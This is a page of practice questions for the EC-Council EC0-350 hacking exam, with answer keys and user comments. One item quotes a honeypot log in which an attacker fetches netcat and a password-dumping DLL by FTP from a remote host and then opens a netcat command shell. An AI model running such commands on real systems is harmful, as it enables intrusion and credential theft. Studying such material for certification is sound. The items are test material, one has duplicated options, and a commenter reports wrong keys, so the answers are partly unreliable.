CompTIA
Checkpoint
ISC
HP
Dell
EC-Council
EXIN
Fortinet
ITIL®
Juniper
PMI
Microsoft
VMware
Avaya
Google
Salesforce
Amazon
Palo Alto Networks
Certiport
ISC2
All Vendors
  2. Home
  3. Exams
  4. EC-Council
  5. EC0-350

Free EC0-350 Exam Braindumps (page: 5)

Page 5 of 191
PDF with 878 Questions

Your boss at ABC.com asks you what are the three stages of Reverse Social Engineering.

  1. Sabotage, advertising, Assisting
  2. Sabotage, Advertising, Covering
  3. Sabotage, Assisting, Billing
  4. Sabotage, Advertising, Covering

Answer(s): A

Explanation:

Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.



Which of the following is the best way an attacker can passively learn about technologies used in an organization?

  1. By sending web bugs to key personnel
  2. By webcrawling the organization web site
  3. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
  4. By performing a port scan on the organization's web site

Answer(s): C

Explanation:

Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks, the question asks "passive"



The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp –s:ftpcom”
“cmd1.exe /c nc –l –p 6969 e-cmd1.exe”
What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k.
  2. There are two attackers on the system – johna2k and haxedj00.
  3. The attack is a remote exploit and the hacker downloads three files.
  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer(s): C



Which of the following statements best describes the term Vulnerability?

  1. A weakness or error that can lead to a compromise
  2. An agent that has the potential to take advantage of a weakness
  3. An action or event that might prejudice security
  4. The loss potential of a threat.

Answer(s): A

Explanation:

Vulnerabilities are all weaknesses that can be exploited.



Page 5 of 191



Post your Comments and Discuss EC-Council EC0-350 exam with other Community members:

blaze commented on December 12, 2024
is the PDF worth it? Are these questions the same on the exam?
Anonymous
upvote

Mike Kutenda Chizinga commented on December 12, 2024
are these questions still valid
Anonymous
upvote

sas commented on December 12, 2024
good but not flexible
Anonymous
upvote

Anonymous commented on December 12, 2024
Very helpful and reference link also has been given.
Anonymous
upvote

Anonymous commented on December 12, 2024
Preparing or certification
Anonymous
upvote

Sai commented on December 12, 2024
Preparing for the exam
AUSTRALIA
upvote

Ankita commented on December 12, 2024
dumps are good and helpful
UNITED STATES
upvote

yajnas commented on December 12, 2024
lot of the questions are from AZ-400 practice test
JAPAN
upvote

yajnas commented on December 12, 2024
very relevant information
JAPAN
upvote

yajnas commented on December 12, 2024
good material
JAPAN
upvote

AEB commented on December 11, 2024
The breadth of knowledge for this exam is large. It doesn't seem possible to learn everything on it for an associate level exam.
UNITED STATES
upvote

rvg commented on December 11, 2024
A great source of preparation for this exam
INDIA
upvote

the coder1 commented on December 11, 2024
It helped alot
UNITED KINGDOM
upvote

N commented on December 11, 2024
This is so good. I will literally ace the test.
Anonymous
upvote

BU WIN SIO commented on December 11, 2024
GOOD VERY HELP FUL
UNITED STATES
upvote

Pss wd commented on December 11, 2024
preparing for exam
Anonymous
upvote

Anonymous commented on December 11, 2024
really good
INDIA
upvote

Anonymous commented on December 10, 2024
Good questions for revision
UNITED STATES
upvote

Milik commented on December 10, 2024
Very resourceful information
Anonymous
upvote

Milik commented on December 10, 2024
Great info Marion to succeed on your test……….
Anonymous
upvote

Ritesh commented on December 10, 2024
Good content
Anonymous
upvote

Mikil commented on December 10, 2024
I will tell others about this study site
Anonymous
upvote

Milik commented on December 10, 2024
Good resource for your studies. I will refer to my frirnds
Anonymous
upvote

Mikil commented on December 10, 2024
I will tell others about this site.
Anonymous
upvote

Mikil commented on December 10, 2024
I will tell others of this site
Anonymous
upvote

Mikil commented on December 10, 2024
Great research for my test
Anonymous
upvote

Mikil commented on December 10, 2024
Great resource. I would tell others
Anonymous
upvote

Mikil commented on December 10, 2024
Great resource
Anonymous
upvote

Michelle commented on December 10, 2024
Great resource
Anonymous
upvote

ArulMani commented on December 10, 2024
It's very useful study for EMT exam
UNITED STATES
upvote

no name commented on December 10, 2024
helpful to recap the course
Anonymous
upvote

none commented on December 10, 2024
very helpful to recall the course
Anonymous
upvote

Sandeep Singh commented on December 10, 2024
All questions are from real exam.
UNITED STATES
upvote

Usman commented on December 10, 2024
It is a great collection but I have noticed that some answers are wrong. For example, it says that correct answer is B but the description of that answer matches with answer A. So it is advisable to read the answer's description as well.
Anonymous
upvote